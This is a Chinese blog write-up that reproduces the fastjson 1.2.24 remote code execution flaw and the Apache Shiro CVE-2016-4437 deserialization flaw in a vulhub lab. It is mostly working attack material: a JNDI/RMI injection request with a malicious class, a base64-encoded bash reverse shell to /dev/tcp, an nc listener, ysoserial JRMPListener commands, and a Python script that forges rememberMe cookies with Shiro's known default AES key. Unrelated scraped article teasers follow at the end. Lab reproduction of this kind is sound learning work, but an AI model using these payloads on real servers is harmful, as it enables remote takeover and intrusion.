fastjson_1.2.24和Shiro(CVE-2016-4437)漏洞复现

文章目录

  • 一、fastjson 1.2.24远程命令执行漏洞复现
  • 二、shiro反序列化漏洞(CVE-2016-4437)
    • 1、Shiro漏洞原理
    • 2、手工验证漏洞
    • 3、使用ShiroAttack2

一、fastjson 1.2.24远程命令执行漏洞复现

配置环境:本机java 8环境 + kali操作系统(java8)

cd ./vulhub-master/fastjson/1.2.24-rce/ # 进入目标文件夹
docker-compose up -d # 启动环境

在这里插入图片描述
浏览器访问127.0.0.1:8090.
在这里插入图片描述
将下面代码保存到TouchFile.java中。

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;public class TouchFile {static {try {Runtime rt = Runtime.getRuntime();String[] commands = {"touch", "/tmp/success"};Process pc = rt.exec(commands);pc.waitFor();} catch (Exception e) {// do nothing}}
}

使用javac编译TouchFile.java
在这里插入图片描述
TouchFile.class复制到kali中,并开启http服务。

python -m http.server 4444

在这里插入图片描述
在本机中安装apache-maven-3.9.6-bin.zip,加一个环境变量,就可以用了~
在这里插入图片描述
在这里插入图片描述
下载marshalsec,然后使用mvn clean package -DskipTests命令生成marshalsec-0.0.3-SNAPSHOT-all.jar

在这里插入图片描述
在这里插入图片描述
marshalsec-0.0.3-SNAPSHOT-all.jar复制到kali中,并使用java8运行下面的命令

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.92.6:4444/#TouchFile" 9999

在这里插入图片描述
在burp中重放下面的数据包:

POST / HTTP/1.1
Host: 192.168.92.6:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://192.168.92.6:9999/TouchFile","autoCommit":true}
}

在这里插入图片描述
可以看到rmi端显示:
在这里插入图片描述

到靶机里查看命令是否执行成功,输入命令进入fastjson环境容器执行 bash。

docker ps # 查看容器ID
docker exec -it <container_id> bash # 进入shell环境
cd /tmp & ls # 查看是否存在success文件

在这里插入图片描述
到此,复现成功~

二、shiro反序列化漏洞(CVE-2016-4437)

1、Shiro漏洞原理

Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会将用户信息加密,加密过程:用户信息=>序列化=>AES加密=>base64编码=>RememberMe Cookie值。如果用户勾选记住密码,那么在请求中会携带cookie,并且将加密信息存放在cookie的rememberMe字段里面,在服务端收到请求对rememberMe值,先base64解码然后AES解密再反序列化,这个加密过程如果我们知道AES加密的密钥,那么我们把用户信息替换成恶意命令,就导致了反序列化RCE漏洞。在shiro版本<=1.2.4中使用了默认密钥kPH+bIxk5D2deZiIxcaaaA==,这就更容易触发RCE漏洞。

故Payload产生的过程:命令=>序列化=>AES加密=>base64编码=>RememberMe Cookie值

2、手工验证漏洞

简单判断漏洞是否存在:勾选记住密码选项后,点击登录,抓包,观察请求包中是否有rememberme字段,响应包中是否有Set-cookie:rememberMe=deleteMe字段。
在这里插入图片描述
具体判断漏洞是否存在:
在这里插入图片描述
手工复现
kali开启5555端口监听

nc -lnvp 5555 # kali监听5555端口

反弹shell命令,是为了获取靶机的shell,同时当命令中包含重定向 <、> 和管道符 | 时,需要进行 base64 编码绕过检测(不编码,执行不了,已经试过了~)runtime-exec

bash -i >& /dev/tcp/192.168.92.6/5555 0>&1 # 反弹shell命令,用shiro反序列化漏洞让靶机执行
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjkyLjYvNTU1NSAwPiYx}|{base64,-d}|{bash,-i}

在这里插入图片描述
执行下面的命令:

git clone https://github.com/frohoff/ysoserial.git # 下载ysoserial-all.jarjava -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 7777 CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjkyLjYvNTU1NSAwPiYx}|{base64,-d}|{bash,-i}"
# 这串代码的大致意思就是:在kali上搭建一个服务器,监听了7777端口,并且存放了反弹到5555端口的反弹shell,且该反弹shell是通过CommonsCollections5利用链生成的反序列化数据。

注意:这里java版本要用java8。
在这里插入图片描述
生成AES加密=>Base64编码后的rememberMe字段:

import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES
def encode_rememberme(command):popen = subprocess.Popen(['java<最好用绝对路径>', '-jar', 'ysoserial-all.jar<最好用绝对路径>'', 'JRMPClient', command], stdout=subprocess.PIPE)BS = AES.block_sizepad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")iv = uuid.uuid4().bytesencryptor = AES.new(key, AES.MODE_CBC, iv)file_body = pad(popen.stdout.read())base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))return base64_ciphertextif __name__ == '__main__':payload = encode_rememberme(sys.argv[1])   
print "rememberMe={0}".format(payload.decode())

注意:python版本为python2.7;还有用pip2安装pycryptodome,即pip install pycryptodome

在这里插入图片描述
在这里插入图片描述
向目标服务器发送下面的数据包

POST /doLogin HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
Origin: http://127.0.0.1:8080
Connection: close
Referer: http://127.0.0.1:8080/login;jsessionid=F02F219A55D5D439A3CC841489816ADF
Cookie: JSESSIONID=F02F219A55D5D439A3CC841489816ADF;rememberMe=mHG+Lu46TyikBy2cgkoOaj3UIdXJytnsFdI4mSd9P5V/cYekTMKeTdmZWfosHFPw9fBw0LpQxALUX3V7uLM4ClTztYsVS/VkumK17LO3M7uUN6tHIcFcy/iFtxCIeRnAYr+fV3MXwrUpgi9nfs9fMWnzv22imiIMXwaj1rYEly9XY9KrKr19MiNx2vAa/DXdvH8wm63XFLROd1iSb8FL9WdHKw60w+fy+jCsKeaibsi6NIJqcoTeePDCq4FFU3yAJh3x7bqThGg5NPpdPCwtQ7KBRiYjOxjs8RSwcydwws9G7DmaJW/2Rzq1dsa9T2aVQUi4kkbhrjSnG/suAW6aGapy4u+wORmduJDS9aIn9NFT9dXqEK4L0iRGPfF6aQ88HFSzT6zBxOVUOis/Tt/s5g==
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1username=123&password=123&rememberme=remember-me

在这里插入图片描述
结果:
在这里插入图片描述
在这里插入图片描述
攻击过程复盘
对于攻击者而言,核心就是干了两件事:

  1. 搭建VPS进行JRMPListener,存放反弹shell的payload1,且该payload是恶意的序列化数据;
  2. 将上述VPS进行JRMPListener的地址进行了AES加密和base64编码,构造请求包cookie中的rememberMe字段,向存在漏洞的服务器发送加密编码后的结果payload2。

靶机服务器的沦陷过程:

  1. 接收到请求包payload2,进行base64解码=>AES解密,发现要和一个VPS的JRMP 7777端口进行通信。
  2. 向恶意站点VPS的JRMP 7777进行请求,接收到了到了序列化后的恶意代码(反弹shell到攻击机的6666端口)payload1。
  3. 对payload1执行了反序列化,执行了反弹shell的恶意命令,就此沦陷。

3、使用ShiroAttack2

直接使用工具ShiroAttack2。

  1. 直接爆破密码,注意目标地址要加上协议~
    在这里插入图片描述
  2. 爆破利用链及回显
    在这里插入图片描述
  3. 远程执行命令
    在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/704472.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

STM32-09-IWDG

文章目录 STM32 IWDG1. IWDG2. IWDG框图3. IWDG寄存器4. IWDG寄存器操作步骤5. IWDG溢出时间计算6. IWDG配置步骤7. 代码实现 STM32 IWDG 1. IWDG IWDG Independent watchdog&#xff0c;即独立看门狗&#xff0c;本质上是一个定时器&#xff0c;这个定时器有一个输出端&#…

shiro_attack工具-shiro反序列化漏洞的快速检测和利用

shiro反序列化漏洞的快速检测和利用 前言 今天分享一个好用的渗透测试工具&#xff0c;主要是针对shiro框架漏洞的&#xff0c;它可以自动的爆破shiro密钥&#xff0c;同时可以写入大马&#xff0c;本人实战中觉得很好用&#xff01;&#xff01;&#xff01; 工具名称 shi…

DDoS防护的市场需求将不断增长,DDoS高防IP显得各位重要

分布式拒绝服务&#xff08;DDoS&#xff09;攻击是一种恶意攻击&#xff0c;它借助于客户/服务器技术&#xff0c;将多个计算机联合起来作为攻击平台&#xff0c;对一个或多个目标发动DDoS攻击&#xff0c;从而成倍地提高拒绝服务攻击的为例。DDoS攻击通过大量合法的请求占用大…

[HNCTF 2024] crypto/pwn

周日的比赛&#xff0c;赛后拿别人的WP又作了俩&#xff0c;最后一个题也是没弄懂&#xff0c;先记一下吧。 Crypto EZmath 一个简单的函数题。在sagemath里有个two_squares函数&#xff0c;可以从平方和恢复两个规模相近的数。这种比较适合于RSA里的p,q。另外未知的e用来猜…

【神经网络与深度学习】Transformer原理

transformer ENCODER 输入部分 对拆分后的语句x [batch_size, seq_len]进行以下操作 Embedding 将离散的输入&#xff08;如单词索引或其他类别特征&#xff09;转换为稠密的实数向量&#xff0c;以便可以在神经网络中使用。位置编码 与RNN相比&#xff0c;RNN是一个字一个字…

机器学习(3)

目录 3-1线性回归 3-2最小二乘解 3-3多元线性回归 3-4广义线性模型 3-5对率回归 3-6对率回归求解 3-7线性判别分析 3-8LDA的多类推广 3-9多分类学习基本思路 3-10类别不平衡 3-1线性回归 线性模型为什么重要&#xff1f; 人类在考虑问题时&#xff0c;通常…

Cocos Creator 3.8.x 透明带滚动功能的容器

ScrollView 是一种带滚动功能的容器 1、删除ScrollView下Sprite组件的SpriteFrame 2、ScrollView下scrollBar的Sprite组件的Color设为&#xff1a;FFFFFF00 3、ScrollView下view的Graphics组件的FillColor设为&#xff1a;FFFFFF00

文档可视化+表单引擎,让数据交互更流畅!

hello&#xff0c;大家好&#xff0c;我是徐小夕。之前和大家分享了很多可视化&#xff0c;零代码和前端工程化的最佳实践&#xff0c;今天继续分享一下最近开发的文档引擎 Nocode/WEP 的最新更新。 往期精彩 零代码AI的阶段性复盘文档引擎AI可视化打造下一代文档编辑器爆肝100…

用docker命令行操作远程的Dockerd daemon服务

本地安装 Dockerd 服务太耗本机磁盘空间了&#xff0c;共用已有的Dockerd服务能够节省一部分空间 修改 Dockerd 服务启动文件&#xff0c;增加TCP监听方式 Dockerd 服务默认监听方式为 Unix Domain Socket &#xff0c;只允许本机连接&#xff0c;想要能够远程连接&#xff0…

selenium发展史

Selenium Core 2004 年&#xff0c;Thoughtworks 的工程师 Jason Huggins 正在负责一个 Web 应用的测试工作&#xff0c;由于这个项目需要频繁回归&#xff0c;这导致他不得不每天做着重复且低效的工作。为了解决这个困境&#xff0c;Jason 开发了一个运行在 JavaScript 沙箱中…

43k Star!推荐一款功能强大的开源笔记软件!

程序员的公众号&#xff1a;源1024&#xff0c;获取更多资料&#xff0c;无加密无套路&#xff01; 最近整理了一份大厂面试资料《史上最全大厂面试题》&#xff0c;Springboot、微服务、算法、数据结构、Zookeeper、Mybatis、Dubbo、linux、Kafka、Elasticsearch、数据库等等 …

2024软件测试必问的常见面试题1000问!

01、您所熟悉的测试用例设计方法都有哪些&#xff1f;请分别以具体的例子来说明这些方法在测试用例设计工作中的应用。 答&#xff1a;有黑盒和白盒两种测试种类&#xff0c;黑盒有等价类划分法&#xff0c;边界分析法&#xff0c;因果图法和错误猜测法。白盒有逻辑覆盖法&…